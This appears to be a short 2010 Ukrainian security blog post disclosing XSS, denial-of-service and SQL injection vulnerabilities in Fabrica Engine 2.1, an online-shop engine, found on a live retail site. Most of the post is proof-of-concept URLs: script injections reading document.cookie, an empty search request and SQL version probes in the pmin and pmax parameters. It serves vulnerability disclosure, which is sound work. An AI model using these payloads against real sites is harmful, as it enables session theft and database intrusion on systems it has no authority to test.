Websecurity - Веб безпека

В 2008 та 2009 роках я знайшов Cross-Site Scripting, Denial of Service та SQL Injection уразливості в Fabrica Engine. Це комерційний движок для онлайн-магазинів. Дані уразливості я виявив на сайті matrix.ua. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/search/?keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmin=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmax=%3Cscript%3Ealert(document.cookie)%3C/script%3E

DoS:

http://site/search/?keyword=

SQL Injection:

http://site/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1
http://site/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1

Уразливі Fabrica Engine 2.1 та попередні версії.

This entry was posted on 23:59 29.11.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.